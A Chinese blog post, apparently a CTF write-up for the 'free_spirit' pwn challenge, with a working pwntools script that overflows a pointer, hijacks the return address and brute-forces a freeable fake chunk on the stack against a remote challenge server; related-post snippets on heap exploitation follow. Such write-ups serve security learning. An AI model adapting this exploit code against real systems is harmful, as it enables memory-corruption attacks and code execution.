free_spirit(在栈上爆破一个可以被free的fake_chunk)

最新推荐文章于 2022-05-03 18:01:59 发布
最新推荐文章于 2022-05-03 18:01:59 发布
阅读量401 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107072237
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

free_spirit(在栈上爆破一个可以被free的fake_chunk)

首先检查一下程序的保护机制

然后,我们用IDA分析一下,功能3存在8字节溢出,将会把v7下面的buf指针覆盖掉,而覆盖了buf指针,就能实现任意地址写。

 

 

那么,我们劫持函数栈返回地址为one_gadget即可,为了绕过结尾对buf的检查,我们的buf非0,且free后不会报错。

但是我们泄露不了堆地址,因此,只能在栈上找一个合适的fake_chunk,因此,可以直接在栈上爆破,直到程序不崩溃,那么就可以执行one_gadget了。

#coding:utf8
from pwn import *

backdoor = 0x0000000000400A3E

i = -54
while True:
   try:
      #sh = process('./free_spirit')
      sh = remote('node3.buuoj.cn',29949)
      i -= 1
      sh.sendlineafter('>','2')
      sh.recvuntil('0x')
      stack_addr = int(sh.recvuntil('\n',drop = True),16)
      print 'stack_addr=',hex(stack_addr)

      sh.sendlineafter('>','1')
      sleep(0.5)
      sh.send('a'*0x8 + p64(stack_addr + 0x58) + '\x00'*0x10)
      sleep(0.5)
      #8字节溢出,覆盖buf指针,造成任意地址写
      sh.sendlineafter('>','3')

      sh.sendlineafter('>','1')
      sh.sendline(p64(backdoor) + p64(stack_addr + i * 8))

      #8字节溢出,覆盖buf指针,使得free不报错
      sh.sendlineafter('>','3')
      #raw_input()
      sh.sendlineafter('>','0')

      sh.interactive()

   except:
      print 'trying...'
      sh.close()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
json fake_useragent fake_useragent
06-24
fake_useragent json缓存 爬虫 fake 消息头
【fast bin dup + house of spiritpwnable_secretgarden
huzai9527的博客
05-20 92
【fast bin dup + house of spirit】 1.ida 分析 add函数没什么问题 remove函数,在free之前没有对结构体中的标志位进行检验,可以进行double freefree后没有置空,存在指针悬挂 2.思路 利用unstored bin泄露libc的地址 申请大chunk并释放 在我们从ustored bin中申请堆块的时候,如果申请的是small bin大小的堆块,那么会先从unstored bin中分割出符合size的堆块,放入到s
linux 堆利用
sky123博客
02-18 4980
堆利用 Unlink 假设正常情况下,每申请一个 chunk 会保存一个指向该 chunk 内存块的指针。 在 chunk1 中构造 fake chunk ,需要注意: 为了绕过 if (__builtin_expect(FD->bk != P || BK->fd != P, 0)) malloc_printerr(check_action, "corrupted double-linked list", P, AV); 令: fake
ciscn_final_4(反调试+在上伪造堆chunk)
seaaseesa的博客
04-30 1119
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在里输入一些数据,因此,我们可以在里伪造一个chunk,然后利用fa...
PWN horcruxes [pwnable.kr]CTF writeup题解系列15
重新启程
01-06 818
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 horcruxes@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ ...
内存指针的问题
Max的专栏
09-04 3045
这几天在学习C过程中,在使用指针作为函数参数传递的时候出现了问题,根本不知道从何得解:源代码如下:    createNode(BinNode *tree,char *p)    {        tree = (BinNode *) malloc(sizeof(BinNode));        tree->data = *p;    }该代码段的意图是通过一个函数创建一个二叉树的节点,然而在,调用该函数后,试图访问该节点结构体的成员时候,却发生了内存访问错误,到底问题出在哪儿呢?一直不明白指针作为函数参
fake_useragent.zip
08-27
在给定的压缩包文件"fake_useragent.zip"中,包含了一个名为"fake_useragent.json"的文件,这是Fake UserAgent库的核心数据文件。 `fake_useragent`库的工作原理是通过读取这个JSON文件,获取预定义的各种真实用户...
fake_useragent_0.1.11.json.zip
09-07
解决fake_useragent提示断网问题
ds.rar_j2me fake
09-23
通过分析和研究这个项目,开发者不仅可以学习到如何在J2ME平台上实现假3D效果,还能提升对于图形编程、性能优化以及资源管理的理解。这对于移动游戏开发、教育软件或者简单的互动应用来说都是宝贵的经验。
ns.rar_Fake Out!
09-20
“ns (noswap)”是一个特殊的设备驱动程序,它的设计目的并非直接与物理硬件交互,而是为操作系统提供一种虚拟化机制,使得虚拟内存系统可以被“欺骗”。这种欺诈技术主要用于测试、调试和研究,因为它允许开发者...
Fastbin的利用
u014377094的博客
03-05 659
我是传送门: pwn_wiki_fastbinattackFastbin Attack - CTF Wiki (ctf-wiki.org) how2heap GitHub - shellphish/how2heap: A repository for learning various heap exploitation techniques. bin结构 struct malloc_chunk { /* #define INTERNAL_SIZE_T size...
堆溢出-unlink
yms0211的博客
03-18 883
#有几张图出自hollk师傅的文章,原文链接:https://blog.csdn.net/qq_41202237/article/details/108481889# 堆溢出-unlink 对unlink的利用大概就是对chunk进行内存布局,然后借助unlink中对指针的操作来修改chunk中的指针 unlink的宏定义: #define unlink(AV, P, BK, FD) { FD = P->f
pwn刷题num46----fast bin double free (控制free chunk的fd指针指向,上伪造的fake chunk,修改上变量值)
tbsqigongzi的博客
05-03 1037
BUUCTF-PWN-metasequoia_2020_samsara 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 保护全开 动态链接 英文意思 打败魔龙后,你变成了魔龙…… 1. 抓捕一个人 2. 吃掉一个人 3. 煮一个人 4. 找到你的巢穴 5. 转移到另一个王国 6. 自杀 ida看一下伪代码 主函数 还有一个菜单函数 观察分析main函数,switch里case1每次申请chunk大小为0x20(mem为0x10), case
JS逆向分析新浪某站登录处RSA加密
道阻且长,行则将至。
02-08 2786
文章目录前言RSA加解密核心思想Pyhon实现NoPadding新浪网实战JS加密分析JS函数调试Py调用脚本BurCrypto爆破插件介绍实战案例总结 前言 在渗透测试过程中,经常会遇到 Web 站点、H5 网页(手机端APP)、微信小程序等系统使用 JS 对用户登录密码或数据包参数进行加密,此时对目标系统进行 JS 逆向分析并破解加密算法就成为无法回避的问题了。 前面写过一篇文章:渗透测试-Python破解前端JS密码加密,记录了对某站点登录处对用户密码进行 DES 前端加密后如何编写 Python 脚
pwnable md5 calculator(随机数生成)
九层台
09-28 487
开启了canary和NX保护 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax int v5; // [esp+18h] [ebp-8h] int v6; // [esp+1Ch] [ebp-4h] setvbuf(stdout, 0, 1, 0);...
BCTF2018-houseofatum-write-题解
z2876563的博客
10-10 345
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些简单
手游之u3d之dll文件加密之手动修复
灯、等灯等灯...
12-06 554
文章标题不知道怎么取。。。 所需工具: 010editor .NET Reflector 一款国外破解版的游戏,u3d引擎,想看修改了啥,但是无奈打开后是这样的 dll加密了,首先想到的是从内存中去抠出来,于是经过一番操作后从内存中扣出来,具体怎么从内存中,这里略过,不是本文重点,网上可以自己找找。 使用反编译工具打开后还是这样 这么牛逼,不用解密就能执行的吗, 好吧,那对比下, 纳尼???内存中抠出来的和加密后的文件对比是一模一样的,说明它可能不需要解密就能执行,..
Linux 二进制漏洞挖掘入门系列之(六)堆块中的 unlink
个人笔记
08-03 932
当我们在使用 free() 函数的时候,就是释放一块内存,这是宏观上的表现。深究起来,堆管理器(ptmalloc)会检查其物理相邻的堆块(chunk)是否空闲,如果空闲,则需要将其从所在的 bin (small bins)中释放出来,与当前 freechunk 进行合并,合并之后,再插入到 unsorted bins 中。在这个过程中,**unlink 就是释放空闲堆块**。这个过程中,如果我们可以构造物理相邻的 chunk,那么就有可能造成**任意地址写**。
ptmalloc heap unlink exploit
MillionSky的专栏
05-21 641
1 概述Heap unlink exploit 前提是要对ptmalloc堆有一定的了解。2 Unlink宏Unlink:用来将一个双向 bin 链表中的一个 chunk 取出来参数:AV:arena header(malloc_state)P :将要unlink的chunkBK:P后面的chunk    <--FD:P前面的chunk    -->具体过程如下:将chunk从FD/B...
fake_useragent
最新发布
09-03
fake_useragent 是一个 Python 库,可以生成随机的 User-Agent,用于爬虫等场景下防止被识别和屏蔽。它可以模拟各种操作系统和浏览器的 User-Agent,包括 Windows、macOS、Linux、Android、iOS 等系统以及 Chrome、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值